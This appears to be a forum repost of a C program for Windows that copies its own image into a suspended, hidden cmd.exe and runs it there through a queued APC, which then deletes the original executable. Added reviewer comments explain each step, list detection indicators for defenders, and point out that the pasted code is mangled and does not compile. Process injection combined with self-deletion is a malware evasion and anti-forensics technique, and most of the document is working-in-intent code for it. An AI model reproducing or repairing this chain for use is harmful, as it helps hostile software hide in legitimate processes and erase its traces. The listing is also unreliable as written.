Nytro

Self-deleting executable


[h=1]Self-deleting executable[/h]by

[h=3]zwclose7[/h]This is another example of PE injection. This program creates a suspended cmd.exe process and then injects its own executable image into the child process. A user-mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls the DeleteFile function to delete the original executable file.

1) Get the PE header of the program using RtlImageNtHeader.

2) Create a suspended cmd.exe using CreateProcess function.

3) Allocate executable memory in the child process.

4) Relocate the executable image, and then write it to the child process using NtWriteVirtualMemory function.

5) Queue a user-mode APC to the child process's primary thread.

6) Resume the primary thread using NtResumeThread function.

7) The primary thread executes the injected code.

8) The injected code calls DeleteFile function to delete the original executable file.

9) The injected code calls ExitProcess function to terminate the cmd.exe process.

#include <Windows.h>

#include <winternl.h>

#pragma comment(lib,"ntdll.lib")

// ntdll exports resolved through ntdll.lib (the #pragma comment above). They are
// not provided by the headers this listing includes, hence the hand-written
// prototypes; NtClose, used later, is not declared here at all.
EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);

EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);

EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);

EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);

// Full path of this executable, filled by GetModuleFileName in WinMain.
// It is deliberately a global: it lives in the image's data section, so when
// WinMain copies the whole image (SizeOfImage bytes) into the child process
// the already-filled path travels with it and ThreadProc can read it there.
// Sized to MAX_PATH (260); longer paths are silently truncated by the caller.
char szFileName[260];

// Executes inside the child process, at the relocated copy of this function
// (WinMain queues it as a user-mode APC on the child's primary thread).
// Retries DeleteFile on the original executable once per second: the early
// attempts fail while the parent process still has the file mapped, and the
// first attempt after the parent has exited succeeds. It then ends the host.
//
// Defender note: the observable footprint is a cmd.exe whose primary thread
// runs from a private RWX region not backed by any module, loops on
// DeleteFile against its parent's image path, and then calls ExitProcess.
// The deleted file is still fully present in that process's memory until it
// exits, so a memory capture of the child recovers the binary.
void WINAPI ThreadProc()

{

// No retry limit: if the file can never be deleted, this loop and the host
// cmd.exe process run indefinitely.
while(1)

{

Sleep(1000);

// szFileName was populated by the parent before the image was copied.
if(DeleteFile(szFileName))

{

break;

}

}

// Never returns to the APC dispatcher; the host process is terminated here.
ExitProcess(0);

}

// Entry point. Copies this process's own image into a freshly created,
// suspended cmd.exe, re-applies the PE base relocations for the remote
// address, queues ThreadProc as an APC on the child's primary thread and
// resumes it. Returns 0 on success, 1 on any failure after the child exists
// (the child is terminated first). The parameters are the standard WinMain
// ones and are not used.
//
// NOTE(review): as pasted on the forum this listing does not compile. Several
// tokens were mangled by the board's markup filter: the `?` on the second
// memset line and at the end of the CreateProcess call, the lower-case `i`
// in `iMAGE_DIRECTORY_ENTRY_BASERELOC`, and the missing element index on
// `list` inside the relocation loop. The comments below describe the intent.
//
// Defender note: the call sequence CreateProcess(CREATE_SUSPENDED) ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> NtWriteVirtualMemory of a whole
// PE image -> QueueUserAPC on the primary thread -> NtResumeThread is a
// textbook APC-injection chain. It is visible through process-creation
// telemetry (cmd.exe created suspended and windowless by a non-shell parent),
// cross-process memory-write callbacks, and scans for executable private
// memory in the child that is not backed by a file on disk.
int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)

{

PIMAGE_NT_HEADERS pINH;

PIMAGE_DATA_DIRECTORY pIDD;

PIMAGE_BASE_RELOCATION pIBR;

HMODULE hModule;

// image: local scratch copy of our own image that gets relocated.
// mem: the region allocated for it in the child. StartAddress: ThreadProc
// translated to the child's copy.
PVOID image,mem,StartAddress;

DWORD i,count,nSizeOfImage;

// delta: remote base minus preferred base. OldDelta: current base minus
// preferred base (what the loader already applied to our running image).
DWORD_PTR delta,OldDelta;

LPWORD list;

PDWORD_PTR p;

STARTUPINFO si;

PROCESS_INFORMATION pi;

// Record our own path in the global before the image is copied; the
// buffer is 260 bytes, so longer paths are truncated without error.
GetModuleFileName(NULL,szFileName,260);

hModule=GetModuleHandle(NULL);

pINH=RtlImageNtHeader(hModule);

// Size of the mapped image (headers + all sections), used for both the
// local copy and the remote allocation.
nSizeOfImage=pINH->OptionalHeader.SizeOfImage;

memset(&si,0,sizeof(si));

// NOTE(review): first argument mangled in the paste (should be the address
// of the PROCESS_INFORMATION structure being zeroed).
memset(?,0,sizeof(pi));

// Child is created suspended so its primary thread has not yet started, and
// with no console window. NOTE(review): the last argument is mangled in the
// paste; it must receive the PROCESS_INFORMATION written into pi below.
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,?))

{

return 1;

}

// Remote region large enough for the whole image, readable/writable/
// executable in one go. This RWX, non-image-backed region is what memory
// scanners flag.
mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

if(mem==NULL)

{

// Failure paths below terminate the child but never close pi.hProcess /
// pi.hThread, and (after the next VirtualAlloc) leak the local copy.
NtTerminateProcess(pi.hProcess,0);

return 1;

}

// Local working copy of our own mapped image. The result is not checked for
// NULL before the memcpy below.
image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(image,hModule,nSizeOfImage);

// Base relocation directory of our image. NOTE(review): the leading
// lower-case `i` in the constant is a paste artifact.
pIDD=&pINH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC];

// First relocation block, addressed inside the local copy (same RVA layout
// as the running image).
pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);

delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);

OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);

// Walk the relocation blocks until the zero-terminated one. Each block is an
// IMAGE_BASE_RELOCATION header followed by WORD entries; the low 12 bits of
// an entry are the offset within the block's page. The high 4 bits (the
// relocation type) are never examined here, so every entry is treated as a
// pointer-sized fixup.
while(pIBR->VirtualAddress!=0)

{

if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))

{

count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);

list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));

for(i=0;i<count;i++)

{

// NOTE(review): `list` is used without an element index here and in the
// mask below (the index was stripped by forum markup); as written this
// compares a pointer and does not compile.
if(list>0)

{

p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list))));

// Undo the loader's adjustment for our current base, then apply the
// adjustment for the remote base.
*p-=OldDelta;

*p+=delta;

}

}

}

// Advance to the next block; no check that it stays within the directory's
// Size, so a malformed table would walk past it.
pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);

}

// Copy the relocated image into the child in one write (bytes-written
// output is not requested).
if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL)))

{

NtTerminateProcess(pi.hProcess,0);

return 1;

}

// ThreadProc's RVA (its address minus our base) rebased onto the remote copy.
StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule);

// Queue the APC on the still-suspended primary thread. On Windows a user APC
// queued to a thread that has not yet started is delivered when it begins
// running, before cmd.exe's own entry point, which is why ThreadProc executes
// at all; the single APC argument is unused (0).
if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0))

{

NtTerminateProcess(pi.hProcess,0);

return 1;

}

// Return values of the resume and close calls are ignored.
NtResumeThread(pi.hThread,NULL);

NtClose(pi.hThread);

NtClose(pi.hProcess);

// Only the local scratch copy is released; the remote region is left for
// the child, which is now executing from it.
VirtualFree(image,0,MEM_RELEASE);

return 0;

}


Sursa: Self-deleting executable - rohitab.com - Forums

